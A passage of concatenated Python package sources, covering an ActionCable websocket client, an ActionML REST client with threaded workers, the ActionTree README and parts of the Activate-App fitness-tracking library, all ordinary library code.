self.logger.debug('Send data: {}'.format(data))
if not self.connected:
self.logger.warning('Connection not established. Return...')
return
self.websocket.send(json.dumps(data))
def _on_open(self, socket):
"""
Called when the connection is open.
"""
self.logger.debug('Connection established.')
def _on_message(self, socket, message):
"""
        Called always when a message arrives.
"""
data = json.loads(message)
message_type = None
identifier = None
subscription = None
if 'type' in data:
message_type = data['type']
if 'identifier' in data:
identifier = json.loads(data['identifier'])
if identifier is not None:
subscription = self.find_subscription(identifier)
if subscription is not None:
subscription.received(data)
elif message_type == 'welcome':
self.logger.debug('Welcome message received.')
for subscription in self.subscriptions.values():
if subscription.state == 'connection_pending':
subscription.create()
elif message_type == 'ping':
if self.log_ping:
self.logger.debug('Ping received.')
else:
self.logger.warning('Message not supported. (Message: {})'.format(message))
def _on_close(self, socket):
"""
Called when the connection was closed.
"""
self.logger.debug('Connection closed.')
for subscription in self.subscriptions.values():
if subscription.state == 'subscribed':
subscription.state = 'connection_pending'
@property
def socket_present(self):
"""
If socket is present.
"""
return self.websocket is not None and self.websocket.sock is not None
@property
def connected(self):
"""
If connected to server.
"""
return self.websocket is not None and \
self.websocket.sock is not None and \
self.websocket.sock.connected
def find_subscription(self, identifier):
"""
Finds a subscription
by its identifier.
"""
for subscription in self.subscriptions.values():
if subscription.identifier == identifier:
return subscription | ActionCableZwei | /ActionCableZwei-0.1.7.2.tar.gz/ActionCableZwei-0.1.7.2/actioncable/connection.py | connection.py |
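# A minimal usage sketch (not part of the library): the URL and origin below
# are hypothetical placeholders for a real Action Cable server.
if __name__ == "__main__":
    logging.basicConfig(level=logging.DEBUG)
    connection = Connection(url="wss://example.com/cable", origin="https://example.com")
    connection.connect()
    time.sleep(2)  # give the background thread a moment to establish the socket
    print("connected:", connection.connected)
    connection.disconnect()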
import uuid
import json
import logging
class Subscription:
"""
Subscriptions on a server.
"""
def __init__(self, connection, identifier):
"""
:param connection: The connection which is used to subscribe.
:param identifier: (Optional) Additional identifier information.
"""
self.uuid = str(uuid.uuid1())
self.connection = connection
self.identifier = identifier
self.receive_callback = None
self.state = 'unsubscribed'
self.message_queue = []
self.logger = logging.getLogger('ActionCable Subscription ({})'.format(self.identifier))
self.connection.subscriptions[self.uuid] = self
def create(self):
"""
Subscribes at the server.
"""
self.logger.debug('Create subscription on server...')
if not self.connection.connected:
self.state = 'connection_pending'
return
data = {
'command': 'subscribe',
'identifier': self._identifier_string()
}
self.connection.send(data)
self.state = 'pending'
def remove(self):
"""
Removes the subscription.
"""
self.logger.debug('Remove subscription from server...')
data = {
'command': 'unsubscribe',
'identifier': self._identifier_string()
}
self.connection.send(data)
self.state = 'unsubscribed'
def send(self, message):
"""
Sends data to the server on the
subscription channel.
:param message: The message to send; its raw_message() result is used as the request data.
"""
self.logger.debug('Send message: {}'.format(message))
if self.state == 'pending' or self.state == 'connection_pending':
self.logger.info('Connection not established. Add message to queue.')
self.message_queue.append(message)
return
elif self.state == 'unsubscribed' or self.state == 'rejected':
self.logger.warning('Not subscribed! Message discarded.')
return
data = {
'command': 'message',
'identifier': self._identifier_string(),
'data': message.raw_message()
}
self.connection.send(data)
def on_receive(self, callback):
"""
Called whenever a message is
received on this channel.
:param callback: The reference to the callback function.
"""
self.logger.debug('On receive callback set.')
self.receive_callback = callback
def received(self, data):
"""
API for the connection to forward
information to this subscription instance.
:param data: The JSON data which was received.
:type data: Message
"""
self.logger.debug('Data received: {}'.format(data))
message_type = None
if 'type' in data:
message_type = data['type']
if message_type == 'confirm_subscription':
self._subscribed()
elif message_type == 'reject_subscription':
self._rejected()
elif self.receive_callback is not None and 'message' in data:
self.receive_callback(data['message'])
else:
self.logger.warning('Message type unknown. ({})'.format(message_type))
def _subscribed(self):
"""
Called when the subscription was
accepted successfully.
"""
self.logger.debug('Subscription confirmed.')
self.state = 'subscribed'
for message in self.message_queue:
self.send(message)
def _rejected(self):
"""
Called if the subscription was
rejected by the server.
"""
self.logger.warning('Subscription rejected.')
self.state = 'rejected'
self.message_queue = []
def _identifier_string(self):
return json.dumps(self.identifier) | ActionCableZwei | /ActionCableZwei-0.1.7.2.tar.gz/ActionCableZwei-0.1.7.2/actioncable/subscription.py | subscription.py |
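# A minimal usage sketch (not part of the library). It assumes the Connection
# class from the sibling connection.py module is importable as
# actioncable.connection (the package layout is an assumption here), and that a
# cable server is reachable at the hypothetical URL below. "ChatChannel" is an
# example channel name.
if __name__ == "__main__":
    from actioncable.connection import Connection

    def print_message(message):
        print("received:", message)

    connection = Connection(url="wss://example.com/cable")
    subscription = Subscription(connection, identifier={"channel": "ChatChannel"})
    subscription.on_receive(print_message)
    connection.connect()
    subscription.create()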
try:
import Queue
except ImportError:
# pylint: disable=F0401
# queue is the Python 3 name of the Queue module.
import queue as Queue
import threading
try:
import httplib
except ImportError:
# pylint: disable=F0401
from http import client as httplib
try:
from urllib import urlencode
except ImportError:
# pylint: disable=F0401,E0611
from urllib.parse import urlencode
import datetime
import json
import logging
# use generators for python2 and python3
try:
xrange
except NameError:
xrange = range
# some constants
MAX_RETRY = 1 # 0 means no retry
# logger
logger = None
DEBUG_LOG = False
def enable_log(filename=None):
global logger
global DEBUG_LOG
timestamp = datetime.datetime.today()
if not filename:
logfile = "./log/actionml_%s.log" % timestamp.strftime(
"%Y-%m-%d_%H:%M:%S.%f")
else:
logfile = filename
logging.basicConfig(filename=logfile,
filemode='w',
level=logging.DEBUG,
format='[%(levelname)s] %(name)s (%(threadName)s) %(message)s')
logger = logging.getLogger(__name__)
DEBUG_LOG = True
class ActionMLAPIError(Exception):
pass
class NotSupportMethodError(ActionMLAPIError):
pass
class ProgramError(ActionMLAPIError):
pass
class AsyncRequest(object):
"""AsyncRequest object
"""
def __init__(self, method, path, **params):
self.method = method # "GET" "POST" etc
# the sub path eg. POST /v1/users.json GET /v1/users/1.json
self.path = path
# dictionary format eg. {"appkey" : 123, "id" : 3}
self.params = params
# use queue to implement response, store AsyncResponse object
self.response_q = Queue.Queue(1)
self.qpath = "%s?%s" % (self.path, urlencode(self.params))
self._response = None
# response function to be called to handle the response
self.response_handler = None
def __str__(self):
return "%s %s %s %s" % (self.method, self.path, self.params,
self.qpath)
def set_response_handler(self, handler):
self.response_handler = handler
def set_response(self, response):
""" store the response
NOTE: Must be only called once
"""
self.response_q.put(response)
def get_response(self):
"""
Get the response. Blocking.
:returns: self.response_handler's return type.
"""
if self._response is None:
tmp_response = self.response_q.get(True) # NOTE: blocking
if self.response_handler is None:
self._response = tmp_response
else:
self._response = self.response_handler(tmp_response)
return self._response
class AsyncResponse(object):
"""
Store the response of asynchronous request
When the response is retrieved, the caller should first check whether error is None (meaning no exception happened).
If error is None, the caller should then check whether the status is the expected one.
"""
def __init__(self):
#: exception object if any happens
self.error = None
self.version = None
self.status = None
self.reason = None
#: Response header. str
self.headers = None
#: Response body. str
self.body = None
#: Jsonified response body. Remains None if conversion is unsuccessful.
self.json_body = None
#: Point back to the AsyncRequest object
self.request = None
def __str__(self):
return "e:%s v:%s s:%s r:%s h:%s b:%s" % (self.error, self.version,
self.status, self.reason,
self.headers, self.body)
def set_resp(self, version, status, reason, headers, body):
self.version = version
self.status = status
self.reason = reason
self.headers = headers
self.body = body
# Try to extract the json.
try:
self.json_body = json.loads(body.decode('utf8'))
except ValueError as ex:
self.json_body = body.decode()
def set_error(self, error):
self.error = error
def set_request(self, request):
self.request = request
class ActionMLHttpConnection(object):
def __init__(self, host, https=True, timeout=5):
if https: # https connection
self._connection = httplib.HTTPSConnection(host, timeout=timeout)
else:
self._connection = httplib.HTTPConnection(host, timeout=timeout)
def connect(self):
self._connection.connect()
def close(self):
self._connection.close()
def request(self, method, url, body={}, headers={}):
"""
HTTP request wrapper function, with retry capability in case of error.
Any exception raised is caught and stored in the returned AsyncResponse object.
Args:
    method: HTTP method, type str
    url: URL path, type str
    body: HTTP request body content, type dict
    headers: HTTP request headers, type dict
Returns:
    AsyncResponse object
"""
response = AsyncResponse()
try:
# number of retry in case of error (minimum 0 means no retry)
retry_limit = MAX_RETRY
mod_headers = dict(headers) # copy the headers
mod_headers["Connection"] = "keep-alive"
enc_body = None
if body: # if body is not empty
# enc_body = urlencode(body)
# mod_headers[
# "Content-type"] = "application/x-www-form-urlencoded"
enc_body = json.dumps(body)
mod_headers[
"Content-type"] = "application/json"
# mod_headers["Accept"] = "text/plain"
except Exception as e:
response.set_error(e)
return response
if DEBUG_LOG:
logger.debug("Request m:%s u:%s h:%s b:%s", method, url,
mod_headers, enc_body)
# retry loop
for i in xrange(retry_limit + 1):
try:
if i != 0:
if DEBUG_LOG:
logger.debug("retry request %s times" % i)
if self._connection.sock is None:
self._connection.connect()
self._connection.request(method, url, enc_body, mod_headers)
except Exception as e:
self._connection.close()
if i == retry_limit:
# new copy of e created everytime??
response.set_error(e)
else: # NOTE: this is try's else clause
# connect() and request() OK
try:
resp = self._connection.getresponse()
except Exception as e:
self._connection.close()
if i == retry_limit:
response.set_error(e)
else: # NOTE: this is try's else clause
# getresponse() OK
resp_version = resp.version # int
resp_status = resp.status # int
resp_reason = resp.reason # str
# resp.getheaders() returns list of tuples
# converted to dict format
resp_headers = dict(resp.getheaders())
# NOTE: have to read the response before sending out next
# http request
resp_body = resp.read() # str
response.set_resp(version=resp_version, status=resp_status,
reason=resp_reason, headers=resp_headers,
body=resp_body)
break # exit retry loop
# end of retry loop
if DEBUG_LOG:
logger.debug("Response %s", response)
return response # AsyncResponse object
def connection_worker(host, request_queue, https=True, timeout=5, loop=True):
"""worker function which establishes connection and wait for request jobs
from the request_queue
Args:
request_queue: the request queue storing the AsyncRequest object
valid requests:
GET
POST
DELETE
KILL
https: HTTPS (True) or HTTP (False)
timeout: timeout for HTTP connection attempts and requests in seconds
loop: if True, this worker function stays in a loop waiting for requests.
Setting it to False is for testing purposes only; it should normally be True.
"""
connect = ActionMLHttpConnection(host, https, timeout)
# loop waiting for job form request queue
killed = not loop
while True:
# print "thread %s waiting for request" % thread.get_ident()
request = request_queue.get(True) # NOTE: blocking get
# print "get request %s" % request
method = request.method
if method == "GET":
path = request.qpath
d = connect.request("GET", path)
elif method == "POST":
path = request.path
body = request.params
d = connect.request("POST", path, body)
elif method == "DELETE":
path = request.qpath
d = connect.request("DELETE", path)
elif method == "KILL":
# tell the thread to kill the connection
killed = True
d = AsyncResponse()
else:
d = AsyncResponse()
d.set_error(NotSupportMethodError(
"Don't Support the method %s" % method))
d.set_request(request)
request.set_response(d)
request_queue.task_done()
if killed:
break
# end of while loop
connect.close()
class Connection(object):
"""abstract object for connection with server
spawn multiple connection_worker threads to handle jobs in the queue q
"""
def __init__(self, host, threads=1, qsize=0, https=True, timeout=5):
"""constructor
Args:
host: host of the server.
threads: type int, number of threads to be spawn
qsize: size of the queue q
https: indicate it is httpS (True) or http connection (False)
timeout: timeout for HTTP connection attempts and requests in
seconds
"""
self.host = host
self.https = https
self.q = Queue.Queue(qsize) # if qsize=0, means infinite
self.threads = threads
self.timeout = timeout
# start thread based on threads number
self.tid = {} # dictionary of thread object
for i in xrange(threads):
tname = "ActionMLThread-%s" % i # thread name
self.tid[i] = threading.Thread(
target=connection_worker, name=tname,
kwargs={'host': self.host, 'request_queue': self.q,
'https': self.https, 'timeout': self.timeout})
self.tid[i].setDaemon(True)
self.tid[i].start()
def make_request(self, request):
"""put the request into the q
"""
self.q.put(request)
def pending_requests(self):
"""number of pending requests in the queue
"""
return self.q.qsize()
def close(self):
"""close this Connection. Call this when main program exits
"""
# set kill message to q
for i in xrange(self.threads):
self.make_request(AsyncRequest("KILL", ""))
self.q.join() # wait for q empty
for i in xrange(self.threads): # wait for all thread finish
self.tid[i].join() | ActionML | /ActionML-0.0.10.tar.gz/ActionML-0.0.10/actionml/connection.py | connection.py |
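# A minimal usage sketch of the low-level connection API (not part of the
# library); the host below is a hypothetical local server.
if __name__ == "__main__":
    conn = Connection(host="localhost:9090", https=False)
    request = AsyncRequest("GET", "/")
    conn.make_request(request)
    response = request.get_response()  # blocks until a worker thread responds
    print(response.status, response.json_body)
    conn.close()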
__version__ = "0.0.10"
# import packages
import re
try:
import httplib
except ImportError:
# pylint: disable=F0401
# http is a Python3 module, replacing httplib
from http import client as httplib
try:
from urllib import quote
except ImportError:
# pylint: disable=F0401,E0611
from urllib.parse import quote
try:
from urllib import urlencode
except ImportError:
# pylint: disable=F0401,E0611
from urllib.parse import urlencode
from datetime import datetime
import pytz
from actionml.connection import Connection
from actionml.connection import AsyncRequest
from actionml.connection import AsyncResponse
from actionml.connection import ActionMLAPIError
class HttpError(ActionMLAPIError):
def __init__(self, message, response):
super(HttpError, self).__init__(message)
self.response = response
class UnexpectedStatusError(HttpError):
def __init__(self, response):
super(UnexpectedStatusError, self).__init__("Unexpected status: {}".format(response.status), response)
class NotImplementedError(HttpError):
def __init__(self, response):
super(NotImplementedError, self).__init__("Not Implemented: {}".format(response.request), response)
class BadRequestError(HttpError):
def __init__(self, response):
super(BadRequestError, self).__init__("Bad request: {}".format(response.request), response)
class NotFoundError(HttpError):
def __init__(self, response):
super(NotFoundError, self).__init__("Not found: {}".format(response.request), response)
def time_to_string_if_valid(t):
""" Validate event_time according to EventAPI Specification."""
if t is None:
return datetime.now(pytz.utc)
if type(t) != datetime:
raise AttributeError("event_time must be datetime.datetime")
if t.tzinfo is None:
raise AttributeError("event_time must have tzinfo")
# EventServer uses milliseconds, but python datetime class uses micro. Hence
# need to skip the last three digits.
return t.strftime("%Y-%m-%dT%H:%M:%S.%f")[:-3] + t.strftime("%z")
class BaseClient(object):
def __init__(self, url, threads=1, qsize=0, timeout=5):
"""Constructor of Client object."""
self.threads = threads
self.url = url
self.qsize = qsize
self.timeout = timeout
# check connection type
https_pattern = r'^https://(.*)'
http_pattern = r'^http://(.*)'
m = re.match(https_pattern, url)
self.https = True
if m is None: # not matching https
m = re.match(http_pattern, url)
self.https = False
if m is None: # not matching http either
raise ActionMLAPIError("url is not valid: %s" % url)
self.host = m.group(1)
self._uid = None # identified uid
self._connection = Connection(
host=self.host,
threads=self.threads,
qsize=self.qsize,
https=self.https,
timeout=self.timeout
)
def close(self):
"""
Close this client and the connection.
Call this method when you want to completely terminate the connection with ActionML.
It will wait for all pending requests to finish.
"""
self._connection.close()
def pending_requests(self):
"""
Return the number of pending requests.
:returns: The number of pending requests of this client.
"""
return self._connection.pending_requests()
def get_status(self):
"""
Get the status of the ActionML API Server
:returns: status message.
:raises: ServerStatusError.
"""
path = "/"
request = AsyncRequest("GET", path)
request.set_response_handler(self._ok_response_handler)
self._connection.make_request(request)
result = request.get_response()
return result
def _add_segment(self, segment=None):
if segment is not None:
return "%s/%s" % (self.path, quote(segment, ""))
else:
return self.path
def _add_get_params(self, path=None, **params):
_path = self.path if path is None else path
return "%s?%s" % (_path, urlencode(params))
def _response_handler(self, expected_status, response):
if response.error is not None:
raise HttpError("Exception happened: {}".format(response.error), response)
elif response.status == httplib.NOT_IMPLEMENTED:
raise NotImplementedError(response)
elif response.status == httplib.BAD_REQUEST:
raise BadRequestError(response)
elif response.status == httplib.NOT_FOUND:
raise NotFoundError(response)
elif response.status != expected_status:
raise UnexpectedStatusError(response)
return response
def _create_response_handler(self, response):
return self._response_handler(httplib.CREATED, response)
def _ok_response_handler(self, response):
return self._response_handler(httplib.OK, response)
class EventClient(BaseClient):
"""
Client for importing data into ActionML PIO Kappa Server.
:param url: the url of ActionML PIO Kappa Server.
:param threads: number of threads to handle ActionML API requests.
Must be >= 1.
:param qsize: the max size of the request queue (optional).
The asynchronous request becomes blocking once this size has been
reached, until the queued requests are handled.
Default value is 0, which means infinite queue size.
:param timeout: timeout for HTTP connection attempts and requests in
seconds (optional).
Default value is 5.
"""
def __init__(self, engine_id, url="http://localhost:9090", threads=1, qsize=0, timeout=5):
assert type(engine_id) is str, "engine_id must be string."
self.engine_id = engine_id
self.path = "/engines/%s/events" % (self.engine_id,)
super(EventClient, self).__init__(url, threads, qsize, timeout)
def async_create(self, event_id, event, entity_type, entity_id,
target_entity_type=None, target_entity_id=None, properties=None,
event_time=None, creation_time=None):
"""
Asynchronously create an event.
:param event_id:
:param event: event name. type str.
:param entity_type: entity type. It is the namespace of the entityId and
analogous to the table name of a relational database. The entityId must be
unique within same entityType. type str.
:param entity_id: entity id. *entity_type-entity_id* becomes the unique
identifier of the entity. For example, you may have entityType named user,
and different entity IDs, say 1 and 2. In this case, user-1 and user-2
uniquely identifies entities. type str
:param target_entity_type: target entity type. type str.
:param target_entity_id: target entity id. type str.
:param properties: a custom dict associated with an event. type dict.
:param event_time: the time of the event. type datetime, must contain
timezone info.
:param creation_time:
:returns:
AsyncRequest object. You can call the get_response() method using this
object to get the final results or status of this asynchronous request.
"""
data = {
"eventId": event_id,
"event": event,
"entityType": entity_type,
"entityId": entity_id,
}
if target_entity_type is not None:
data["targetEntityType"] = target_entity_type
if target_entity_id is not None:
data["targetEntityId"] = target_entity_id
if properties is not None:
data["properties"] = properties
data["eventTime"] = time_to_string_if_valid(event_time)
data["creationTime"] = time_to_string_if_valid(creation_time)
request = AsyncRequest("POST", self.path, **data)
request.set_response_handler(self._create_response_handler)
self._connection.make_request(request)
return request
def create(self, event_id, event, entity_type, entity_id,
target_entity_type = None, target_entity_id = None, properties = None,
event_time = None, creation_time = None):
"""Synchronously (blocking) create an event."""
return self.async_create(event_id, event, entity_type, entity_id,
target_entity_type, target_entity_id, properties,
event_time, creation_time).get_response()
def async_get(self, event_id):
"""
Asynchronously get an event from PIO Kappa Server.
:param event_id: event id returned by the EventServer when creating the event.
:returns: AsyncRequest object.
"""
request = AsyncRequest("GET", self._add_segment(event_id))
request.set_response_handler(self._ok_response_handler)
self._connection.make_request(request)
return request
def get(self, event_id):
"""Synchronouly get an event from PIO Kappa Server."""
return self.async_get(event_id).get_response()
def async_delete(self, event_id):
"""Asynchronouly delete an event from PIO Kappa Server.
:param event_id: event id returned by the EventServer when creating the
event.
:returns:
AsyncRequest object.
"""
request = AsyncRequest("DELETE", self._add_segment(event_id))
request.set_response_handler(self._ok_response_handler)
self._connection.make_request(request)
return request
def delete(self, event_id):
"""Synchronously delete an event from PIO Kappa Server."""
return self.async_delete(event_id).get_response()
class EngineClient(BaseClient):
def __init__(self, url="http://localhost:9090", threads=1, qsize=0, timeout=5):
self.path = "/engines"
super(EngineClient, self).__init__(url, threads, qsize, timeout)
def async_get(self, engine_id):
"""
Asynchronously get an engine info from PIO Kappa Server.
:param engine_id:
:returns: AsyncRequest object.
"""
request = AsyncRequest("GET", self._add_segment(self.path, engine_id))
request.set_response_handler(self._ok_response_handler)
self._connection.make_request(request)
return request
def get(self, engine_id):
return self.async_get(engine_id).get_response()
def async_create(self, data):
"""
Asynchronously create engine.
:param data:
:return:
"""
request = AsyncRequest("POST", self.path, **data)
request.set_response_handler(self._create_response_handler)
self._connection.make_request(request)
return request
def create(self, data):
return self.async_create(data).get_response()
def async_update(self, engine_id, data, data_delete=False, force=False):
"""
Asynchronously update engine.
:param force:
:param data_delete:
:param data:
:param engine_id:
:return:
"""
query = {}
if data_delete:
query['data_delete'] = True
if force:
query['force'] = True
path = self._add_segment(engine_id)
path = self._add_get_params(path, **query)
request = AsyncRequest("POST", path, **data)
request.set_response_handler(self._ok_response_handler)
self._connection.make_request(request)
return request
def update(self, engine_id, data, data_delete=False, force=False):
return self.async_update(engine_id, data, data_delete, force).get_response()
def async_delete(self, engine_id):
request = AsyncRequest("DELETE", self._add_segment(engine_id))
request.set_response_handler(self._ok_response_handler)
self._connection.make_request(request)
return request
def delete(self, engine_id):
return self.async_delete(engine_id).get_response()
class QueryClient(BaseClient):
"""
Client for extracting prediction results from an ActionML Engine
Instance.
:param url: the url of the ActionML Engine Instance.
:param threads: number of threads to handle ActionML API requests. Must be >= 1.
:param qsize: the max size of the request queue (optional).
The asynchronous request becomes blocking once this size has been
reached, until the queued requests are handled.
Default value is 0, which means infinite queue size.
:param timeout: timeout for HTTP connection attempts and requests in seconds (optional). Default value is 5.
"""
def __init__(self, engine_id, url = "http://localhost:9090", threads=1, qsize=0, timeout=5):
self.engine_id = engine_id
self.path = "/engines/{}/queries".format(self.engine_id)
super(QueryClient, self).__init__(url, threads, qsize, timeout)
def async_send_query(self, data):
"""
Asynchronously send a request to the engine instance with data as the query.
:param data: the query: It is converted to an json object using json.dumps method. type dict.
:returns:
AsyncRequest object. You can call the get_response() method using this
object to get the final results or status of this asynchronous request.
"""
request = AsyncRequest("POST", self.path, **data)
request.set_response_handler(self._ok_response_handler)
self._connection.make_request(request)
return request
def send_query(self, data):
"""
Synchronously send a request.
:param data: the query: It is converted to an json object using json.dumps method. type dict.
:returns: the prediction.
"""
return self.async_send_query(data).get_response()
class CommandClient(BaseClient):
def __init__(self, url = "http://localhost:9090", threads=1, qsize=0, timeout=5):
self.path = "/commands"
super(CommandClient, self).__init__(url, threads, qsize, timeout)
def async_get_engines_list(self):
request = AsyncRequest("GET", self.path + "/list/engines")
request.set_response_handler(self._ok_response_handler)
self._connection.make_request(request)
return request
def get_engines_list(self):
return self.async_get_engines_list().get_response()
def async_get_commands_list(self):
request = AsyncRequest("GET", self.path + "/list/commands")
request.set_response_handler(self._ok_response_handler)
self._connection.make_request(request)
return request
def get_commands_list(self):
return self.async_get_commands_list().get_response()
def async_run_command(self, engine_id):
data = {}
if engine_id is not None:
data['engine_id'] = engine_id
request = AsyncRequest("POST", self.path + "/batch-train", **data)
request.set_response_handler(self._ok_response_handler)
self._connection.make_request(request)
return request
def run_command(self, engine_id):
return self.async_run_command(engine_id).get_response()
def async_check_command(self, command_id):
request = AsyncRequest("GET", self._add_segment(command_id))
request.set_response_handler(self._ok_response_handler)
self._connection.make_request(request)
return request
def check_command(self, command_id):
return self.async_check_command(command_id).get_response()
def async_cancel_command(self, command_id):
request = AsyncRequest("DELETE", self._add_segment(command_id))
request.set_response_handler(self._ok_response_handler)
self._connection.make_request(request)
return request
def cancel_command(self, command_id):
return self.async_cancel_command(command_id).get_response() | ActionML | /ActionML-0.0.10.tar.gz/ActionML-0.0.10/actionml/__init__.py | __init__.py |
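# A minimal usage sketch (not part of the library). The server URL, engine id
# and query fields below are hypothetical and depend on the deployed engine.
if __name__ == "__main__":
    event_client = EventClient(engine_id="my_engine", url="http://localhost:9090")
    result = event_client.create(
        event_id="1",
        event="purchase",
        entity_type="user",
        entity_id="u1",
        target_entity_type="item",
        target_entity_id="i1",
        event_time=datetime.now(pytz.utc),
    )
    print(result.status, result.json_body)
    event_client.close()

    query_client = QueryClient(engine_id="my_engine", url="http://localhost:9090")
    prediction = query_client.send_query({"user": "u1", "num": 4})
    print(prediction.json_body)
    query_client.close()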
*ActionTree* is a Python (3.5+) library to execute (long) actions in parallel, respecting dependencies between those actions.
You create a dependency graph of actions to be executed and then call the ``execute`` function on its root.
It's licensed under the `MIT license <http://choosealicense.com/licenses/mit/>`_.
It's available on the `Python package index <http://pypi.python.org/pypi/ActionTree>`_.
Its `documentation <http://jacquev6.github.io/ActionTree>`_
and its `source code <https://github.com/jacquev6/ActionTree>`_ are on GitHub.
Questions? Remarks? Bugs? Want to contribute? `Open an issue <https://github.com/jacquev6/ActionTree/issues>`_!
.. image:: https://img.shields.io/github/workflow/status/jacquev6/ActionTree/Continuous%20Integration?label=CI&logo=github
:target: https://github.com/jacquev6/ActionTree/actions?query=workflow%3A%22Continuous+Integration%22
.. image:: https://img.shields.io/pypi/v/ActionTree?logo=pypi
:alt: PyPI
:target: https://pypi.org/project/ActionTree/
.. image:: https://img.shields.io/pypi/pyversions/ActionTree?logo=pypi
:alt: PyPI
:target: https://pypi.org/project/ActionTree/
Quick start
===========
Install from PyPI::
$ pip install ActionTree
With dependencies to create Gantt charts and dependency graphs::
$ pip install 'ActionTree[dependency_graphs,gantt]'
Import:
>>> from ActionTree import execute
>>> from ActionTree.stock import CallSubprocess
Execute some action:
>>> link = CallSubprocess(["g++", "a.o", "b.o", "-o", "test"])
>>> link.add_dependency(CallSubprocess(["g++", "-c", "a.cpp", "-o", "a.o"]))
>>> link.add_dependency(CallSubprocess(["g++", "-c", "b.cpp", "-o", "b.o"]))
>>> report = execute(link)
And verify everything went well:
>>> report.is_success
True
>>> os.path.isfile("test")
True
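Dependencies can be shared between actions, so the graph does not have to be a strict tree. As a sketch in the same spirit as above (assuming the same source files), both compilations can depend on a single preparation step:
>>> prepare = CallSubprocess(["mkdir", "-p", "build"])
>>> compile_a = CallSubprocess(["g++", "-c", "a.cpp", "-o", "build/a.o"])
>>> compile_a.add_dependency(prepare)
>>> compile_b = CallSubprocess(["g++", "-c", "b.cpp", "-o", "build/b.o"])
>>> compile_b.add_dependency(prepare)
>>> link = CallSubprocess(["g++", "build/a.o", "build/b.o", "-o", "test"])
>>> link.add_dependency(compile_a)
>>> link.add_dependency(compile_b)
>>> report = execute(link)
>>> report.is_success
True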
| ActionTree | /ActionTree-0.13.2.tar.gz/ActionTree-0.13.2/README.rst | README.rst |
import shutil
from dataclasses import dataclass
from datetime import datetime
from typing import Optional
from uuid import UUID, uuid4
from activate import serialise
from activate import track as track_
from activate.units import DimensionValue
def from_track(name, sport, track, filename):
return Activity(name, sport, track, filename)
def none_default(value, default):
"""Return default if value is None else value."""
return default if value is None else value
@dataclass(init=False)
class Activity:
name: str
sport: str
track: track_.Track
original_name: str
flags: dict
effort_level: int
start_time: datetime
distance: float
activity_id: UUID
description: str
photos: list
server: Optional[str]
username: Optional[str]
def __init__(
self,
name,
sport,
track,
original_name,
flags=None,
effort_level=None,
start_time=None,
distance=None,
activity_id=None,
description="",
photos=None,
server=None,
username=None,
):
self.name = name
self.sport = sport
if isinstance(track, dict):
if "manual" in track:
del track["manual"]
self.track = track_.ManualTrack(**track)
else:
self.track = track_.Track(track)
else:
self.track = track
self.original_name = original_name
self.server = server
self.username = username
self.flags = none_default(flags, {})
self.effort_level = effort_level
self.start_time = none_default(start_time, self.track.start_time)
self.distance = none_default(distance, self.track.length)
self.activity_id = none_default(activity_id, uuid4())
self.description = description
self.photos = none_default(photos, [])
@property
def stats(self):
result = {}
result["Distance"] = DimensionValue(self.distance, "distance")
result["Elapsed Time"] = DimensionValue(self.track.elapsed_time, "time")
if not self.track.manual and self.track.moving_time < self.track.elapsed_time:
result["Moving Time"] = DimensionValue(self.track.moving_time, "time")
if self.track.has_altitude_data:
result["Ascent"] = DimensionValue(self.track.ascent, "altitude")
result["Descent"] = DimensionValue(self.track.descent, "altitude")
average_speed = self.track.average("speed")
if average_speed > 0:
if not self.track.manual:
average_speed_moving = self.track.average_speed_moving
if average_speed_moving / average_speed < 1.01:
average_speed_moving = None
else:
average_speed_moving = None
result["Average Speed"] = DimensionValue(average_speed, "speed")
if average_speed_moving is not None:
result["Mov. Av. Speed"] = DimensionValue(average_speed_moving, "speed")
result["Pace"] = DimensionValue(1 / average_speed, "pace")
if average_speed_moving is not None:
result["Pace (mov.)"] = DimensionValue(1 / average_speed_moving, "pace")
if not self.track.manual:
result["Max. Speed"] = DimensionValue(self.track.maximum("speed"), "speed")
if self.track.has_altitude_data:
result["Highest Point"] = DimensionValue(
self.track.maximum("ele"), "altitude"
)
if "heartrate" in self.track:
result["Average HR"] = DimensionValue(
self.track.average("heartrate"), "heartrate"
)
if "cadence" in self.track:
result["Avg. Cadence"] = DimensionValue(
self.track.average("cadence"), "cadence"
)
if "power" in self.track:
result["Average Power"] = DimensionValue(
self.track.average("power"), "power"
)
result["Max. Power"] = DimensionValue(self.track.maximum("power"), "power")
return result
@property
def active_flags(self):
return [k for k, v in self.flags.items() if v]
def unload(self, unloaded_class):
return unloaded_class(
self.name,
self.sport,
self.flags,
self.effort_level,
self.start_time,
self.distance,
self.track.elapsed_time,
self.track.ascent,
self.activity_id,
self.server,
self.username,
)
@property
def save_data(self):
return {
"name": self.name,
"sport": self.sport,
"track": self.track.save_data,
"original_name": self.original_name,
"flags": self.flags,
"effort_level": self.effort_level,
"start_time": self.start_time,
"distance": self.distance,
"activity_id": self.activity_id,
"description": self.description,
"photos": self.photos,
"server": self.server,
"username": self.username,
}
def save(self, path):
serialise.dump(self.save_data, path / f"{self.activity_id}.json.gz", gz=True)
def export_original(self, filename):
shutil.copy2(self.original_name, filename) | Activate-App | /Activate_App-0.0.10-py3-none-any.whl/activate/activity.py | activity.py |
import math
from datetime import timedelta
from activate import times
def as_int(value) -> str:
"""Format a value as an integer, ready to display."""
return str(round(value))
def maybe_as_int(value) -> str:
"""
Format a value as an integer if it is one.
Any very close value will be formatted as an integer to avoid
floating-point errors.
"""
if math.isclose(value, round(value)):
return as_int(value)
return str(value)
def info_format(entry: str):
"""Format an value for the info box."""
if entry in {"Average Speed", "Mov. Av. Speed", "Distance"}:
return "{:.2f}".format
if entry in {"Max. Speed", "Average Power", "Average HR", "Avg. Cadence"}:
return "{:.1f}".format
if entry in {"Ascent", "Descent", "Highest Point", "Max. Power"}:
return as_int
if entry in {"Elapsed Time", "Moving Time", "Pace", "Pace (mov.)"}:
return times.to_string
if entry is None:
return lambda x: x
raise ValueError(f"Unknown entry: {entry}")
def split_format(entry: str):
"""Format a value for the splits table."""
if entry == "Number":
return as_int
if entry in {"Time", "Split"}:
return times.to_string
if entry in {"Net Climb", "Ascent"}:
return as_int
if entry == "Speed":
return "{:.2f}".format
raise ValueError(f"Unknown entry: {entry}")
def list_format(entry: str):
"""Format a value for the splits table."""
if entry in {"Name", "Type", "Server", "User"}:
return None
if entry == "Distance":
return "{:.2f}".format
if entry == "Start Time":
return lambda value: str(times.round_time(value))
raise ValueError(f"Unknown entry: {entry}")
def default_as_string(value) -> str:
"""
Round a value in a sensible way.
Always shows at least the nearest integer. Any extra precision is
limited to the lesser of two decimal places, or three significant
figures. Also formats timedeltas nicely.
"""
if isinstance(value, tuple):
suffix = " " + value[1]
value = value[0]
else:
suffix = ""
